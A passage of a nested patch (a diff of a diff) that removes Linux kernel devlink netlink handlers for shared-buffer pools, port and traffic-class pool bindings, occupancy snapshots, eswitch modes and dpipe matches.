+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_sb_get_doit(struct sk_buff *skb,
+-				      struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_sb *devlink_sb;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_sb_fill(msg, devlink, devlink_sb,
+-				 DEVLINK_CMD_SB_NEW,
+-				 info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_sb_get_dumpit(struct sk_buff *msg,
+-					struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_sb *devlink_sb;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_sb_fill(msg, devlink, devlink_sb,
+-						 DEVLINK_CMD_SB_NEW,
+-						 NETLINK_CB(cb->skb).portid,
+-						 cb->nlh->nlmsg_seq,
+-						 NLM_F_MULTI);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_nl_sb_pool_fill(struct sk_buff *msg, struct devlink *devlink,
+-				   struct devlink_sb *devlink_sb,
+-				   u16 pool_index, enum devlink_command cmd,
+-				   u32 portid, u32 seq, int flags)
+-{
+-	struct devlink_sb_pool_info pool_info;
+-	void *hdr;
+-	int err;
+-
+-	err = devlink->ops->sb_pool_get(devlink, devlink_sb->index,
+-					pool_index, &pool_info);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_TYPE, pool_info.pool_type))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_POOL_SIZE, pool_info.size))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE,
+-		       pool_info.threshold_type))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_POOL_CELL_SIZE,
+-			pool_info.cell_size))
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_sb_pool_get_doit(struct sk_buff *skb,
+-					   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_sb *devlink_sb;
+-	struct sk_buff *msg;
+-	u16 pool_index;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	if (!devlink->ops->sb_pool_get)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_sb_pool_fill(msg, devlink, devlink_sb, pool_index,
+-				      DEVLINK_CMD_SB_POOL_NEW,
+-				      info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int __sb_pool_get_dumpit(struct sk_buff *msg, int start, int *p_idx,
+-				struct devlink *devlink,
+-				struct devlink_sb *devlink_sb,
+-				u32 portid, u32 seq)
+-{
+-	u16 pool_count = devlink_sb_pool_count(devlink_sb);
+-	u16 pool_index;
+-	int err;
+-
+-	for (pool_index = 0; pool_index < pool_count; pool_index++) {
+-		if (*p_idx < start) {
+-			(*p_idx)++;
+-			continue;
+-		}
+-		err = devlink_nl_sb_pool_fill(msg, devlink,
+-					      devlink_sb,
+-					      pool_index,
+-					      DEVLINK_CMD_SB_POOL_NEW,
+-					      portid, seq, NLM_F_MULTI);
+-		if (err)
+-			return err;
+-		(*p_idx)++;
+-	}
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_sb_pool_get_dumpit(struct sk_buff *msg,
+-					     struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_sb *devlink_sb;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (!devlink->ops->sb_pool_get)
+-			goto retry;
+-
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-			err = __sb_pool_get_dumpit(msg, start, &idx, devlink,
+-						   devlink_sb,
+-						   NETLINK_CB(cb->skb).portid,
+-						   cb->nlh->nlmsg_seq);
+-			if (err == -EOPNOTSUPP) {
+-				err = 0;
+-			} else if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-		}
+-		devl_unlock(devlink);
+-retry:
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_sb_pool_set(struct devlink *devlink, unsigned int sb_index,
+-			       u16 pool_index, u32 size,
+-			       enum devlink_sb_threshold_type threshold_type,
+-			       struct netlink_ext_ack *extack)
+-
+-{
+-	const struct devlink_ops *ops = devlink->ops;
+-
+-	if (ops->sb_pool_set)
+-		return ops->sb_pool_set(devlink, sb_index, pool_index,
+-					size, threshold_type, extack);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_cmd_sb_pool_set_doit(struct sk_buff *skb,
+-					   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	enum devlink_sb_threshold_type threshold_type;
+-	struct devlink_sb *devlink_sb;
+-	u16 pool_index;
+-	u32 size;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	err = devlink_sb_th_type_get_from_info(info, &threshold_type);
+-	if (err)
+-		return err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_POOL_SIZE))
+-		return -EINVAL;
+-
+-	size = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_POOL_SIZE]);
+-	return devlink_sb_pool_set(devlink, devlink_sb->index,
+-				   pool_index, size, threshold_type,
+-				   info->extack);
+-}
+-
+-static int devlink_nl_sb_port_pool_fill(struct sk_buff *msg,
+-					struct devlink *devlink,
+-					struct devlink_port *devlink_port,
+-					struct devlink_sb *devlink_sb,
+-					u16 pool_index,
+-					enum devlink_command cmd,
+-					u32 portid, u32 seq, int flags)
+-{
+-	const struct devlink_ops *ops = devlink->ops;
+-	u32 threshold;
+-	void *hdr;
+-	int err;
+-
+-	err = ops->sb_port_pool_get(devlink_port, devlink_sb->index,
+-				    pool_index, &threshold);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_THRESHOLD, threshold))
+-		goto nla_put_failure;
+-
+-	if (ops->sb_occ_port_pool_get) {
+-		u32 cur;
+-		u32 max;
+-
+-		err = ops->sb_occ_port_pool_get(devlink_port, devlink_sb->index,
+-						pool_index, &cur, &max);
+-		if (err && err != -EOPNOTSUPP)
+-			goto sb_occ_get_failure;
+-		if (!err) {
+-			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_CUR, cur))
+-				goto nla_put_failure;
+-			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_MAX, max))
+-				goto nla_put_failure;
+-		}
+-	}
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-sb_occ_get_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_sb_port_pool_get_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = devlink_port->devlink;
+-	struct devlink_sb *devlink_sb;
+-	struct sk_buff *msg;
+-	u16 pool_index;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	if (!devlink->ops->sb_port_pool_get)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_sb_port_pool_fill(msg, devlink, devlink_port,
+-					   devlink_sb, pool_index,
+-					   DEVLINK_CMD_SB_PORT_POOL_NEW,
+-					   info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int __sb_port_pool_get_dumpit(struct sk_buff *msg, int start, int *p_idx,
+-				     struct devlink *devlink,
+-				     struct devlink_sb *devlink_sb,
+-				     u32 portid, u32 seq)
+-{
+-	struct devlink_port *devlink_port;
+-	u16 pool_count = devlink_sb_pool_count(devlink_sb);
+-	u16 pool_index;
+-	int err;
+-
+-	list_for_each_entry(devlink_port, &devlink->port_list, list) {
+-		for (pool_index = 0; pool_index < pool_count; pool_index++) {
+-			if (*p_idx < start) {
+-				(*p_idx)++;
+-				continue;
+-			}
+-			err = devlink_nl_sb_port_pool_fill(msg, devlink,
+-							   devlink_port,
+-							   devlink_sb,
+-							   pool_index,
+-							   DEVLINK_CMD_SB_PORT_POOL_NEW,
+-							   portid, seq,
+-							   NLM_F_MULTI);
+-			if (err)
+-				return err;
+-			(*p_idx)++;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_sb_port_pool_get_dumpit(struct sk_buff *msg,
+-						  struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_sb *devlink_sb;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (!devlink->ops->sb_port_pool_get)
+-			goto retry;
+-
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-			err = __sb_port_pool_get_dumpit(msg, start, &idx,
+-							devlink, devlink_sb,
+-							NETLINK_CB(cb->skb).portid,
+-							cb->nlh->nlmsg_seq);
+-			if (err == -EOPNOTSUPP) {
+-				err = 0;
+-			} else if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-		}
+-		devl_unlock(devlink);
+-retry:
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_sb_port_pool_set(struct devlink_port *devlink_port,
+-				    unsigned int sb_index, u16 pool_index,
+-				    u32 threshold,
+-				    struct netlink_ext_ack *extack)
+-
+-{
+-	const struct devlink_ops *ops = devlink_port->devlink->ops;
+-
+-	if (ops->sb_port_pool_set)
+-		return ops->sb_port_pool_set(devlink_port, sb_index,
+-					     pool_index, threshold, extack);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_cmd_sb_port_pool_set_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_sb *devlink_sb;
+-	u16 pool_index;
+-	u32 threshold;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_THRESHOLD))
+-		return -EINVAL;
+-
+-	threshold = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_THRESHOLD]);
+-	return devlink_sb_port_pool_set(devlink_port, devlink_sb->index,
+-					pool_index, threshold, info->extack);
+-}
+-
+-static int
+-devlink_nl_sb_tc_pool_bind_fill(struct sk_buff *msg, struct devlink *devlink,
+-				struct devlink_port *devlink_port,
+-				struct devlink_sb *devlink_sb, u16 tc_index,
+-				enum devlink_sb_pool_type pool_type,
+-				enum devlink_command cmd,
+-				u32 portid, u32 seq, int flags)
+-{
+-	const struct devlink_ops *ops = devlink->ops;
+-	u16 pool_index;
+-	u32 threshold;
+-	void *hdr;
+-	int err;
+-
+-	err = ops->sb_tc_pool_bind_get(devlink_port, devlink_sb->index,
+-				       tc_index, pool_type,
+-				       &pool_index, &threshold);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_TC_INDEX, tc_index))
+-		goto nla_put_failure;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_TYPE, pool_type))
+-		goto nla_put_failure;
+-	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
+-		goto nla_put_failure;
+-	if (nla_put_u32(msg, DEVLINK_ATTR_SB_THRESHOLD, threshold))
+-		goto nla_put_failure;
+-
+-	if (ops->sb_occ_tc_port_bind_get) {
+-		u32 cur;
+-		u32 max;
+-
+-		err = ops->sb_occ_tc_port_bind_get(devlink_port,
+-						   devlink_sb->index,
+-						   tc_index, pool_type,
+-						   &cur, &max);
+-		if (err && err != -EOPNOTSUPP)
+-			return err;
+-		if (!err) {
+-			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_CUR, cur))
+-				goto nla_put_failure;
+-			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_MAX, max))
+-				goto nla_put_failure;
+-		}
+-	}
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_sb_tc_pool_bind_get_doit(struct sk_buff *skb,
+-						   struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = devlink_port->devlink;
+-	struct devlink_sb *devlink_sb;
+-	struct sk_buff *msg;
+-	enum devlink_sb_pool_type pool_type;
+-	u16 tc_index;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_type_get_from_info(info, &pool_type);
+-	if (err)
+-		return err;
+-
+-	err = devlink_sb_tc_index_get_from_info(devlink_sb, info,
+-						pool_type, &tc_index);
+-	if (err)
+-		return err;
+-
+-	if (!devlink->ops->sb_tc_pool_bind_get)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink, devlink_port,
+-					      devlink_sb, tc_index, pool_type,
+-					      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
+-					      info->snd_portid,
+-					      info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int __sb_tc_pool_bind_get_dumpit(struct sk_buff *msg,
+-					int start, int *p_idx,
+-					struct devlink *devlink,
+-					struct devlink_sb *devlink_sb,
+-					u32 portid, u32 seq)
+-{
+-	struct devlink_port *devlink_port;
+-	u16 tc_index;
+-	int err;
+-
+-	list_for_each_entry(devlink_port, &devlink->port_list, list) {
+-		for (tc_index = 0;
+-		     tc_index < devlink_sb->ingress_tc_count; tc_index++) {
+-			if (*p_idx < start) {
+-				(*p_idx)++;
+-				continue;
+-			}
+-			err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink,
+-							      devlink_port,
+-							      devlink_sb,
+-							      tc_index,
+-							      DEVLINK_SB_POOL_TYPE_INGRESS,
+-							      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
+-							      portid, seq,
+-							      NLM_F_MULTI);
+-			if (err)
+-				return err;
+-			(*p_idx)++;
+-		}
+-		for (tc_index = 0;
+-		     tc_index < devlink_sb->egress_tc_count; tc_index++) {
+-			if (*p_idx < start) {
+-				(*p_idx)++;
+-				continue;
+-			}
+-			err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink,
+-							      devlink_port,
+-							      devlink_sb,
+-							      tc_index,
+-							      DEVLINK_SB_POOL_TYPE_EGRESS,
+-							      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
+-							      portid, seq,
+-							      NLM_F_MULTI);
+-			if (err)
+-				return err;
+-			(*p_idx)++;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int
+-devlink_nl_cmd_sb_tc_pool_bind_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	struct devlink_sb *devlink_sb;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (!devlink->ops->sb_tc_pool_bind_get)
+-			goto retry;
+-
+-		devl_lock(devlink);
+-		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-			err = __sb_tc_pool_bind_get_dumpit(msg, start, &idx,
+-							   devlink,
+-							   devlink_sb,
+-							   NETLINK_CB(cb->skb).portid,
+-							   cb->nlh->nlmsg_seq);
+-			if (err == -EOPNOTSUPP) {
+-				err = 0;
+-			} else if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-		}
+-		devl_unlock(devlink);
+-retry:
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_sb_tc_pool_bind_set(struct devlink_port *devlink_port,
+-				       unsigned int sb_index, u16 tc_index,
+-				       enum devlink_sb_pool_type pool_type,
+-				       u16 pool_index, u32 threshold,
+-				       struct netlink_ext_ack *extack)
+-
+-{
+-	const struct devlink_ops *ops = devlink_port->devlink->ops;
+-
+-	if (ops->sb_tc_pool_bind_set)
+-		return ops->sb_tc_pool_bind_set(devlink_port, sb_index,
+-						tc_index, pool_type,
+-						pool_index, threshold, extack);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_cmd_sb_tc_pool_bind_set_doit(struct sk_buff *skb,
+-						   struct genl_info *info)
+-{
+-	struct devlink_port *devlink_port = info->user_ptr[1];
+-	struct devlink *devlink = info->user_ptr[0];
+-	enum devlink_sb_pool_type pool_type;
+-	struct devlink_sb *devlink_sb;
+-	u16 tc_index;
+-	u16 pool_index;
+-	u32 threshold;
+-	int err;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	err = devlink_sb_pool_type_get_from_info(info, &pool_type);
+-	if (err)
+-		return err;
+-
+-	err = devlink_sb_tc_index_get_from_info(devlink_sb, info,
+-						pool_type, &tc_index);
+-	if (err)
+-		return err;
+-
+-	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
+-						  &pool_index);
+-	if (err)
+-		return err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_THRESHOLD))
+-		return -EINVAL;
+-
+-	threshold = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_THRESHOLD]);
+-	return devlink_sb_tc_pool_bind_set(devlink_port, devlink_sb->index,
+-					   tc_index, pool_type,
+-					   pool_index, threshold, info->extack);
+-}
+-
+-static int devlink_nl_cmd_sb_occ_snapshot_doit(struct sk_buff *skb,
+-					       struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const struct devlink_ops *ops = devlink->ops;
+-	struct devlink_sb *devlink_sb;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	if (ops->sb_occ_snapshot)
+-		return ops->sb_occ_snapshot(devlink, devlink_sb->index);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_cmd_sb_occ_max_clear_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const struct devlink_ops *ops = devlink->ops;
+-	struct devlink_sb *devlink_sb;
+-
+-	devlink_sb = devlink_sb_get_from_info(devlink, info);
+-	if (IS_ERR(devlink_sb))
+-		return PTR_ERR(devlink_sb);
+-
+-	if (ops->sb_occ_max_clear)
+-		return ops->sb_occ_max_clear(devlink, devlink_sb->index);
+-	return -EOPNOTSUPP;
+-}
+-
+-static int devlink_nl_eswitch_fill(struct sk_buff *msg, struct devlink *devlink,
+-				   enum devlink_command cmd, u32 portid,
+-				   u32 seq, int flags)
+-{
+-	const struct devlink_ops *ops = devlink->ops;
+-	enum devlink_eswitch_encap_mode encap_mode;
+-	u8 inline_mode;
+-	void *hdr;
+-	int err = 0;
+-	u16 mode;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	err = devlink_nl_put_handle(msg, devlink);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	if (ops->eswitch_mode_get) {
+-		err = ops->eswitch_mode_get(devlink, &mode);
+-		if (err)
+-			goto nla_put_failure;
+-		err = nla_put_u16(msg, DEVLINK_ATTR_ESWITCH_MODE, mode);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	if (ops->eswitch_inline_mode_get) {
+-		err = ops->eswitch_inline_mode_get(devlink, &inline_mode);
+-		if (err)
+-			goto nla_put_failure;
+-		err = nla_put_u8(msg, DEVLINK_ATTR_ESWITCH_INLINE_MODE,
+-				 inline_mode);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	if (ops->eswitch_encap_mode_get) {
+-		err = ops->eswitch_encap_mode_get(devlink, &encap_mode);
+-		if (err)
+-			goto nla_put_failure;
+-		err = nla_put_u8(msg, DEVLINK_ATTR_ESWITCH_ENCAP_MODE, encap_mode);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_eswitch_get_doit(struct sk_buff *skb,
+-					   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_eswitch_fill(msg, devlink, DEVLINK_CMD_ESWITCH_GET,
+-				      info->snd_portid, info->snd_seq, 0);
+-
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_rate_nodes_check(struct devlink *devlink, u16 mode,
+-				    struct netlink_ext_ack *extack)
+-{
+-	struct devlink_rate *devlink_rate;
+-
+-	list_for_each_entry(devlink_rate, &devlink->rate_list, list)
+-		if (devlink_rate_is_node(devlink_rate)) {
+-			NL_SET_ERR_MSG_MOD(extack, "Rate node(s) exists.");
+-			return -EBUSY;
+-		}
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_eswitch_set_doit(struct sk_buff *skb,
+-					   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const struct devlink_ops *ops = devlink->ops;
+-	enum devlink_eswitch_encap_mode encap_mode;
+-	u8 inline_mode;
+-	int err = 0;
+-	u16 mode;
+-
+-	if (info->attrs[DEVLINK_ATTR_ESWITCH_MODE]) {
+-		if (!ops->eswitch_mode_set)
+-			return -EOPNOTSUPP;
+-		mode = nla_get_u16(info->attrs[DEVLINK_ATTR_ESWITCH_MODE]);
+-		err = devlink_rate_nodes_check(devlink, mode, info->extack);
+-		if (err)
+-			return err;
+-		err = ops->eswitch_mode_set(devlink, mode, info->extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_ESWITCH_INLINE_MODE]) {
+-		if (!ops->eswitch_inline_mode_set)
+-			return -EOPNOTSUPP;
+-		inline_mode = nla_get_u8(
+-				info->attrs[DEVLINK_ATTR_ESWITCH_INLINE_MODE]);
+-		err = ops->eswitch_inline_mode_set(devlink, inline_mode,
+-						   info->extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_ESWITCH_ENCAP_MODE]) {
+-		if (!ops->eswitch_encap_mode_set)
+-			return -EOPNOTSUPP;
+-		encap_mode = nla_get_u8(info->attrs[DEVLINK_ATTR_ESWITCH_ENCAP_MODE]);
+-		err = ops->eswitch_encap_mode_set(devlink, encap_mode,
+-						  info->extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-int devlink_dpipe_match_put(struct sk_buff *skb,
+-			    struct devlink_dpipe_match *match)
+-{
+-	struct devlink_dpipe_header *header = match->header;
+-	struct devlink_dpipe_field *field = &header->fields[match->field_id];
+-	struct nlattr *match_attr;
+-
+-	match_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_MATCH);
+-	if (!match_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_MATCH_TYPE, match->type) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_INDEX, match->header_index) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, match_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, match_attr);
+-	return -EMSGSIZE;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_match_put);
+-
+-static int devlink_dpipe_matches_put(struct devlink_dpipe_table *table,
+-				     struct sk_buff *skb)
+-{
+-	struct nlattr *matches_attr;
+-
+-	matches_attr = nla_nest_start_noflag(skb,
+-					     DEVLINK_ATTR_DPIPE_TABLE_MATCHES);
+-	if (!matches_attr)
+-		return -EMSGSIZE;
+-
+-	if (table->table_ops->matches_dump(table->priv, skb))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, matches_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, matches_attr);
+-	return -EMSGSIZE;
+-}
+-
+-int devlink_dpipe_action_put(struct sk_buff *skb,
+-			     struct devlink_dpipe_action *action)
+-{
+-	struct devlink_dpipe_header *header = action->header;
